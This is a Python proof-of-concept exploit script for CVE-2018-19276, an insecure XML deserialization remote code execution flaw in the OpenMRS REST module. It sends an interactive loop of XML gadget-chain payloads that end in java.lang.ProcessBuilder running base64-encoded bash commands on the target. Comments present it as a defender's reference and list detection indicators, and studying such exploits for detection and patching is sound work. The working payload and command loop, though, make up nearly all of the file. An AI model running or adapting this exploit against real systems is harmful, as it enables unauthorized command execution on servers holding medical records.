import base64
import requests
import sys
import re
# for java8
# Proof-of-concept script for CVE-2018-19276 (OpenMRS REST module, insecure
# XML deserialization).  Read it as a defender's reference: the request shape
# below is what an access-log review, WAF or IDS rule should key on, and the
# success check shows what a vulnerable server leaks in its error page.
# NOTE(review): "for java8" is the only hint about the target runtime; the
# class names used in the XML are JDK-internal, so the document presumably
# only resolves on a Java 8 runtime -- not confirmed here.
remote = "http://127.0.0.1:8888/"  # base URL of the instance under test (local by default)
ressource = "/openmrs/ws/rest/v1/concept"  # REST resource that accepts an XML request body
proxy = {
}  # requests proxy mapping (e.g. an interception proxy); empty means direct
if __name__ == "__main__":
print("\nCVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE\n")
print("[+] Checking if ressource available =>", end=' ')
# Probe: an XML-typed POST with no body to the concept resource.  The script
# treats an HTTP 500 as "endpoint present"; any other status aborts.  This
# probe alone (empty application/xml POST answered with 500) is a useful
# log signature for detection.
burp0_url = remote + ressource
burp0_headers = {"Content-Type": "application/xml"}
r = requests.post(burp0_url, headers=burp0_headers, proxies=proxy,
verify=False, allow_redirects=False)
if r.status_code == 500:
print("\033[92mOK\033[0m")
else:
print("KO, ressource doesn't exist")
sys.exit()
# Interactive loop: each entered command is sent in one XML request.
# Output is never returned to the client ("not reflected" below), so the
# script only learns whether the server reacted, not what the command did.
while True:
try:
command = input("command (\033[92mnot reflected\033[0m)> ")
if command == "exit":
print("Exiting...")
break
# The command is base64-encoded and spliced into the XML document below;
# '/' is replaced with '+' before splicing.
command = base64.b64encode(command.encode('utf-8'))
command_str = command.decode('utf-8')
command_str = command_str.replace('/', '+')
print("[+] Executing command =>", end=' ')
# Same concept resource, this time with Content-Type text/xml and a body.
burp0_url = "http://127.0.0.1:8888/openmrs/ws/rest/v1/concept"
burp0_headers = {"Content-Type": "text/xml"}
# The body is an XML document of nested JDK class names that ends in a
# java.lang.ProcessBuilder invoking /bin/bash -c on the encoded command.
# For detection, element/class names such as jdk.nashorn.internal.objects.NativeString,
# javax.crypto.CipherInputStream, javax.imageio.spi.FilterIterator and
# java.lang.ProcessBuilder inside an inbound XML body to the REST API are
# strong indicators; none of them belong in legitimate OpenMRS REST traffic.
burp0_data = "<map>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString>\r\n <flags>0</flags>\r\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n <dataHandler>\r\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n <is class=\"javax.crypto.CipherInputStream\">\r\n <cipher class=\"javax.crypto.NullCipher\">\r\n <initialized>false</initialized>\r\n <opmode>0</opmode>\r\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"java.util.Collections$EmptyIterator\"/>\r\n <next class=\"java.lang.ProcessBuilder\">\r\n <command>\r\n <string>/bin/bash</string>\r\n <string>-c</string>\r\n \t\t\t<string>{echo," + command_str + \
"}|{base64,-d}|{bash,-i}</string>\r\n </command>\r\n <redirectErrorStream>false</redirectErrorStream>\r\n </next>\r\n </iter>\r\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n <method>\r\n <class>java.lang.ProcessBuilder</class>\r\n <name>start</name>\r\n <parameter-types/>\r\n </method>\r\n <name>foo</name>\r\n </filter>\r\n <next class=\"string\">foo</next>\r\n </serviceIterator>\r\n <lock/>\r\n </cipher>\r\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n <ibuffer></ibuffer>\r\n <done>false</done>\r\n <ostart>0</ostart>\r\n <ofinish>0</ofinish>\r\n <closed>false</closed>\r\n </is>\r\n <consumed>false</consumed>\r\n </dataSource>\r\n <transferFlavors/>\r\n </dataHandler>\r\n <dataLen>0</dataLen>\r\n </value>\r\n </jdk.nashorn.internal.objects.NativeString>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n</map>"
r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy,
verify=False, allow_redirects=False)
# Success heuristic: a 500 whose error text mentions java.util.HashMap.  A
# server that surfaces deserialization stack traces to the client like this
# is itself a finding (verbose error pages); the mitigation for the underlying
# issue is a patched OpenMRS REST module and keeping the REST API off
# untrusted networks -- NOTE(review): fixed versions are not stated on this page.
if r.status_code == 500:
m = re.search(
'(java.util.HashMap)', r.text)
if m:
print("\033[92mOK\033[0m")
else:
print("KO")
except KeyboardInterrupt:
print("Exiting...")
break